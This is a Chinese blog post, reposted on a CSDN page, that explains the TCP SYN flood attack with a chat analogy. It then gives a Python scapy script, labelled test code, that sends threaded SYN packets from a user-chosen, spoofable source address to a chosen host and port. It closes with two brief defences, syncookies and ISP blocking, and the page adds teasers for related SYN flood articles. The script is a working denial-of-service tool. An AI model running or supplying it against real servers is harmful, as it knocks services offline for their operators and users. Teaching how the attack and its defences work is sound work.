syn flood

最新推荐文章于 2024-08-31 21:24:29 发布
最新推荐文章于 2024-08-31 21:24:29 发布
阅读量90 收藏
点赞数
文章标签: 网络 python
原文链接:https://my.oschina.net/0eb1/blog/863364
版权

        在通过tcp协议,client端和server端建连的过程中,client端首先向服务端发送一个flag为syn的tcp包。好比大家通过qq聊天时先问,美女在不?妹子收到这个包之后就会恢复,我在的,你在不在?也就是一个ack+syn包。这个时候,如果我们不回妹子,妹子就会很郁闷,过会妹子又会问,我在的,你在不在?也就是再发一个ack+syn包,若果我们继续不回,过段时间之后,妹子就会关掉这个聊天窗口,对于服务器来说,服务器会回收掉这个socket。如果有妹子的好多好友突然疯狂的发送,美女在不在,当这样的包太多的时候,就会干扰妹子正常的qq聊天,如果妹子的电脑性能不佳,妹子就不得不关闭qq或者是关机了。

        对服务器而言,维护这样一种syn-received的链接状态,需要耗费一定的内存和cpu资源。当这种连接数数以万计或者更多的时候,服务器不得不花费大量的资源来处理这些资源,有时候在服务器上执行netstat都会卡死,用ss -s的话很快。

测试代码:

#!/usr/bin/python

from random import randint
from scapy.all import *
import threading

class Settings(object):
    def __init__(self):
        self.src_addr=raw_input("enter src ip address:").strip()
        self.dst_addr=raw_input("enter dst ip address:").strip()
        self.dport=int(raw_input("enter dst port:"))
        self.tcp_flags='S'

class Packet(object):
    def __init__(self,setting):
        self.setting=setting
        self.packet=(IP(src=self.setting.src_addr,dst=self.setting.dst_addr)/TCP(sport=randint(20000,50000),dport=self.setting.dport,flags=self.setting.tcp_flags))

def fire(bullets):
    threads=[]
    for packet in bullets:
        threads.append(threading.Thread(target=sr1,args=(packet.packet),kwargs={'verbose':1,'timeout':5}))
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    print "Done"

def main():
    setting=Settings()
    nums=int(raw_input("enter num of threads:"))
    bullets=[Packet(setting) for i in range(nums)]
    fire(bullets)

main()

syn-flood的防御方法(自己只知道这么多.....):

(1)开启syncookie

在/etc/sysctl.conf配置文件中添加:net.ipv4.tcp_syncookies = 1,然后执行sysctl -p

(2)联系ISP对攻击IP进行封杀

转载于:https://my.oschina.net/0eb1/blog/863364

chuangsongnang1077
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python:实现SynFlood 洪水流量攻击(附完整源码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
03-28 542
python:实现SynFlood 洪水流量攻击(附完整源码)
Python实现SYN Flood攻击
WHACKW的专栏
11-24 6490
0×00 背景 SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。 0×01 Code 本文章的目是介绍使用python构造packet的方法。 使用raw socket来发送packets。 该程序只适用于Li
认识 SYN Flood 攻击
Dablelv 的博客专栏。
02-01 1098
SYN Flood 是互联网上最原始、最经典的 DDoS(Distributed Denial of Service)攻击之一。SYN 报文指的是 TCP 协议中的 Synchronize 报文,是 TCP 三次握手过程中的首个报文。让我们先来了解一个正常的TCP三次握手过程。
SYN Flood
秀才的专栏
04-19 3058
kernel: possible SYN flooding on port 80. Sending cookies. 以上是系统日志中的信息,可能是遭到SYN洪水攻击(SYN Flood)。 那什么是SYN Flood呢? SYN Flood攻击是一种典型的拒绝服务型(Denial of Service)攻击。所谓拒绝服务型攻击就是通过进行攻击,使受害主机或网络不能够良好的提供服
SYN Flood攻击实验
Anubizs的博客
06-18 1562
SYN flood攻击是一种常见的拒绝服务(DoS)攻击,旨在通过耗尽目标系统的资源(内存或连接表),使其无法处理合法的连接请求。
Python 实现SynFlood洪水攻击
CSDN
10-07 8693
Syn-Flood攻击属于TCP攻击,Flood类攻击中最常见,危害最大的是Syn-Flood攻击,也是历史最悠久的攻击之一,该攻击属于半开放攻击,攻击实现原理就是通过发送大量半连接状态的数据包,从而耗尽目标系统的连接池,默认情况下每一种系统的并发连接都是有限制的,如果恶意攻击持续进行,将会耗尽系统有限的连接池资源。windows 系统半开连接数是10个。
Linux 防范SYN Flood攻击
峰迹的博客
04-18 801
通过上述措施,可以显著提高服务器对SYN Flood攻击的防御能力。然而,网络安全是一个持续的过程,需要定期审查和更新安全策略。此外,监控系统日志和网络流量,以及使用专业的入侵检测系统(IDS),也是防范网络攻击的重要组成部分。
SYN Flood是什么?这篇给你讲明白!
a38417的博客
05-21 1063
手,还体现在超时与重传的机制。它利用了TCP协议的三次握手机制,攻击者通常利用工具或者控制僵尸主机向服务器发送海量的变源IP地址或变源端口的TCP SYN报文,服务器响应了这些报文后就会生成大量的半连接,当系统资源被耗尽后,服务器将无法提供正常的服务。这种行为的关键结果是,必须将新的(或未使用的)内存专用于复制的TCB,而不是更新已分配的内存。此时就需要Anti-DDoS系统的能力了,它部署在网络入口处,在服务器之前处理SYN报文,识别出虚假源,屏蔽来自这些地址的报文,只将合法的SYN报文传递给服务器。
SYN Flood攻击是什么,如何防止攻击
HoewDec的博客
05-03 913
攻击者发送TCP SYNSYN是TCP三次握手中的第一个数据包,而当服务器返回ACK后,该攻击者就不对其进行再确认,那这个TCP连接就处于挂起状态,也就是所谓的半连接状态,服务器收不到再确认的话,还会重复发送ACK给攻击者。为了克服这个缺点,DoS攻击者开发了分布式的攻击。以多个随机的源主机地址向目的主机发送syn包,而在收到目的主机的syn+ ack包后并不回应,目的主机为这些源主机建立大量的连接队列,由于没有收到ack一直维护这些连接队列,造成资源的大量消耗而不能向正常的请求提供服务。
SYN Flood攻击
weixin_50699777的博客
12-24 755
@kali实现SYN flood攻击 小白!小白! 第一次写,可能会有写错误 希望共同进步 SYN Flood攻击一、使用步骤1.基础设置2.设置连通性3.攻击总结 一、使用步骤 1.基础设置 在同一个局域网下,两台虚拟主机之间进行 SYN Flood 攻击。 攻击者:Kali Linux。 它的 IP 地址为 192.168.1.2。 被攻击者 Windows server 2008 ,IP 地址为 192.168.1.1。 1> 把两台虚拟主机的网络连接到改为仅主机模式并把俩台虚拟机的IP地
SYN flood C源代码
01-25
SYN flood是属于DOS攻击的一种典型方式,其发生方式就出现在TCP连接的三次握手中,假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手...
Linux下基于SYN Cookie的防SYN Flood攻击的实现与改进.pdf
09-06
Linux下基于SYN Cookie的防SYN Flood攻击的实现与改进 Linux操作系统中,SYN Flood攻击是一种常见的DoS攻击方式,对服务器的性能造成了极大的影响。为了防止SYN Flood攻击,SYN Cookie是一种常用的防御方式。本文...
synflood.zip
05-25
标题“synflood.zip”指的是一个包含用于模拟SYN Flood攻击的工具的压缩包。SYN Flood是一种拒绝服务(DoS)攻击,攻击者通过发送大量伪造的TCP连接请求(SYN包)来淹没目标服务器,使其无法处理合法用户的请求。...
syn flood测试工具
03-11
**TCP/IP基础知识** TCP/IP(Transmission Control Protocol/Internet Protocol)是互联网上最广泛使用的...同时,也要关注网络防御技术的发展,如SYN Cookie、连接复用等技术,它们是抵抗SYN Flood攻击的有效手段。
syn flood.zip
08-13
**SYN Flood攻击详解** SYN Flood是一种常见的拒绝服务(Denial of Service, DoS)攻击,通过利用TCP协议的握手过程来瘫痪目标网络或系统。这种攻击方式利用了TCP连接建立时的三次握手机制,大量发送SYN(同步序列...
网络压缩之网络剪枝(network pruning)
最新发布
前行居士
08-31 416
网络剪枝(network pruning)就是要把网络里面的一些参数剪掉。剪枝就是修剪的意思,把网络里面的一些参数剪掉。为什么可以把网络里面的一些参数剪 掉呢?这么大的网络里面有很多很多的参数,每一个参数不一定都有在做事。参数这么多的 时候,也许很多参数只是在划水,什么事也没有做。这些没有做的参数放在那边,就只是占空 间而已,浪费计算资源而已。为何就把它们剪掉呢?所以网络剪枝就是把一个大的网络中没 有用的那些参数把它找出来,把它扔掉。人刚出生的时候,脑袋是空空的,神经元跟神经元间 没什么连接
33.python socket
笔生花的博客
08-27 1723
python socket 心跳包 数据包
Linux网络:TCP & UDP socket
盒马的博客
08-27 1221
讲解Linux中TCP与UDP的套接字相关接口
SSH是什么?
思索的涟漪,突破自我
08-28 665
SSH的工作原理可以简单理解为,它在用户和服务器之间建立了一条“安全隧道”,通过这条隧道传输的数据都被加密,防止中间人攻击或数据泄露。公钥认证的原理是用户在本地生成一对密钥,其中公钥存放在服务器上,私钥则保存在本地。在现代互联网环境中,安全性越来越受到重视,SSH凭借其强大的加密能力和灵活的认证方式,成为了维护网络安全的重要工具之一。使用SSH时,用户只需要在终端或命令行界面输入简单的命令,就可以连接到远程服务器,执行各种操作,如文件传输、远程执行命令,甚至通过端口转发实现复杂的网络功能。
python syn flood
12-15
Python syn flood是一种用于发起网络攻击的工具。该工具利用Python编程语言实现了syn flood攻击的功能,通过不断发送大量的伪造TCP连接请求(SYN包),使目标主机的TCP链接队列被耗尽,从而导致正常的网络通信被中断。 Python syn flood工具的设计目的主要是为了测试网络系统的安全性和稳定性,同时也可被恶意攻击者用于发起网络攻击。通过Python syn flood工具可以模拟大规模的网络流量,从而造成目标主机的资源耗尽或者服务不可用。这种攻击对于一些未经充分防护的网络系统来说是十分危险的。 为了防范Python syn flood攻击,网络管理员可以采取一些措施,如配置防火墙、使用入侵检测系统、对网络设备进行安全加固等。此外,合理规划网络结构、限制每个IP的连接数、使用黑名单机制等也可以有效地阻止syn flood攻击。 总的来说,Python syn flood攻击作为一种网络安全威胁,需要引起网络管理者的高度重视。通过加强网络安全意识、合理配置网络设备、增强网络防护能力等措施,可以有效地减少Python syn flood攻击造成的危害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值